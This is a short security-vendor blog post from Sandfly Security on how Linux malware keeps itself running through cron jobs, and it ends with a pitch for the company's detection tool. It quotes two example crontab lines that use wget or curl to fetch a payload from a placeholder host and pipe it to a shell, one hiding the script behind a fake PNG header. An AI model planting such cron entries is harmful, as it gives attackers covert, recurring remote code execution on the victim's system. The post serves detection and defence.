Linux Malware Persistence with Cron

Malware Rootkits Linux Security Linux Forensics

May 01, 2018
The Sandfly Security Team

If malware is anything at all, it’s persistent. On Linux, just like Windows, malware once loaded wants to stay loaded. On Windows systems this is usually done with a variety of registry mechanisms. For Linux it’s often done using the crontab scheduling facility.

The cron facility on Linux mimics the Unix cron facility that has existed for decades. Basically, as a user you can tell the computer to run a task on a periodic basis. This is usually done for maintenance scripts, backups, and other common automated tasks.

But, many system administrators don’t pay much attention to crontab (or the sister utility “at“). As a result, malware has become fond of injecting itself into these areas to make sure it always remains on the host even if you try to remove it. Attackers inject their commands and cron will make sure their malware runs and stays up to date at a regular interval. If you don’t check these areas for signs of an intruder, you are likely overlooking the backdoors they left behind to make sure they can enter at will.

Recently the trend with malware is to inject a simple loader onto the host or use the wget and curl commands to pull over malicious code and updates. A technique covered in this post discusses a clever use of default system commands to embed a covert channel malicious script inside a file that looks like an ordinary jpg or png file at first glance.

A few examples go a long way:

*/11 * * * * wget -O - -q http://<malicious_url>/pics/logo.jpg|sh

*/5 * * * * curl http://<malicious_url>/malicious.png -k|dd skip=2446 bs=1|sh

The first example simply takes a file that is named like a jpg but is just a shell script.

The second example though is a simple and clever method to be more stealthy. Here they download a file that externally would look like a png file if you inspected it with normal filesystem tools like file. Yet, if you pass it through the Linux dd command and skip ahead 2446 bytes you get to the malicious payload which is then run through a shell command. Simple and effective.

One of the reasons we created Sandfly is to help administrators look in the corners of their systems for suspicious activity just like this. Sandfly incorporates investigation modules that will check your cron and at jobs for malware persistence and other threats.

When was the last time you checked your cron and at jobs to make sure they looked OK? Not often is our experience. Sandfly can do it for you constantly throughout the day and give you detailed information about problems if found. Some examples of malicious cron and at jobs are shown below. Sandfly’s agentless security technology helps make finding activity like this automated, fast, and reliable.

Let Sandfly keep your Linux systems secure.

Learn More